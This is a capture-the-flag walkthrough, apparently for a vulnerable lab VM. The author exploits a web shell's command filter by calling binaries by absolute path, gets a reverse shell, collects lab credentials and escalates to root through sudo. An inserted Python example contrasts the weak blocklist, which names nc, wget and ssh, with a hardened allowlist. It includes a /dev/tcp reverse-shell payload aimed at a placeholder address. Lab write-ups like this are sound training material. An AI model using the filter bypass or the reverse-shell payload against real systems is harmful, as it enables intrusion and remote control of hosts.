Use nmap to do a thorough port scan.

Checking the HTTP service (port 80), there is an interesting entry in robots.txt: /dev_shell.php

OK, RCE. After trying some commands, I found that some commands are filtered, like "ls", and that commands must not contain ";".

But "dir" is not filtered.

There seems to be a backup file of the webshell; download it and audit it.

OK, ";" is filtered out, and the command is split on spaces and each token is checked against a blocklist: the command is rejected if any token is one of "pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc".

The bypass is easy: the blocklist compares whole tokens against bare command names, so calling the binary by its absolute path (e.g. /bin/ls instead of ls) slips straight through.
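To make the weakness concrete, here is a small Python model of the filter as the write-up describes it (reject ";", split on spaces, compare each token to the blocklist), next to a hardened version. This is an added example written for this post, not the original dev_shell.php or its backup; the ALLOWLIST contents and the 10.0.0.1:4444 listener in the sample payload are assumptions chosen for illustration.

```python
import os
import shlex
import subprocess
from typing import List, Optional

# Blocklist exactly as the write-up describes it.
BLOCKLIST = {"pwd", "ls", "netcat", "ssh", "wget", "ping", "traceroute", "cat", "nc"}

# Assumed allowlist for the hardened variant: the handful of commands a
# "dev shell" might legitimately need to expose. Adjust to taste.
ALLOWLIST = {"dir", "id", "uname", "whoami"}

# Constructed sample payload: a reverse-shell-shaped command with a placeholder
# listener address. It never names a blocklisted program, so the weak filter
# cannot see it.
REVERSE_SHELL_SHAPED = "/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"


def weak_filter_allows(cmd: str) -> bool:
    """Model of the original check: True means the command would be executed.

    Reject on a literal ';', otherwise split on single spaces and reject if any
    token is exactly a blocklisted name. '/bin/ls' is not 'ls', so it passes.
    """
    if ";" in cmd:
        return False
    return not any(tok in BLOCKLIST for tok in cmd.split(" "))


def strict_filter_allows(cmd: str) -> bool:
    """Hardened check: shell-aware tokenising, basename comparison, allowlist only.

    Refuses shell metacharacters outright, then requires the *program name*
    (basename of the first token) to be in ALLOWLIST, so 'ls', '/bin/ls' and
    '/usr/bin/ls' are treated identically.
    """
    if any(ch in cmd for ch in ";|&`$<>()\n"):
        return False
    try:
        tokens = shlex.split(cmd)
    except ValueError:
        return False
    if not tokens:
        return False
    return os.path.basename(tokens[0]) in ALLOWLIST


def run_strict(cmd: str) -> Optional[str]:
    """Execute an allowlisted command without a shell; None if it was refused.

    The program is looked up by basename on PATH rather than taken from the
    user-supplied path, and shell=False means no chaining or redirection.
    """
    if not strict_filter_allows(cmd):
        return None
    tokens: List[str] = shlex.split(cmd)
    tokens[0] = os.path.basename(tokens[0])
    return subprocess.run(tokens, capture_output=True, text=True).stdout


if __name__ == "__main__":
    for candidate in ("ls -la", "ls;id", "/bin/ls -la", "dir /home", REVERSE_SHELL_SHAPED):
        print(f"{candidate!r:60} weak={weak_filter_allows(candidate)!s:5} strict={strict_filter_allows(candidate)}")
```

The point of the comparison is that a token blocklist is an identity check on spelling, while the hardened version checks what would actually run: the resolved program name against an allowlist, with metacharacters refused and no shell involved.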

Get a reverse shell:

Walked around and gathered some information.

I have a few credentials now:

jc:Qwerty

seb:T1tanium_Paword_Hack3rs_Fear_M3

But none of these accounts can do anything special. Checked for SUID files and also got nothing. The Debian release is quite new, so no exploit is available.

Found the ProFTPD 1.3.3c installation file in /home/bob/Downloads. That version has a backdoor, but from the nmap result the running ProFTPD is version 1.3.5b, and trying the backdoor also failed.

Found something suspicious in /home/bob/Documents.

notes.sh does not make any sense to me.

login.txt.gpg seems to contain login credentials, but it is encrypted; I tried to decrypt it but failed after several passphrase attempts.

Googled for a walkthrough and found out that this is the passphrase:

Use bob:b0bcat_ to log in to bob's account, and easily get a root shell with sudo /bin/bash.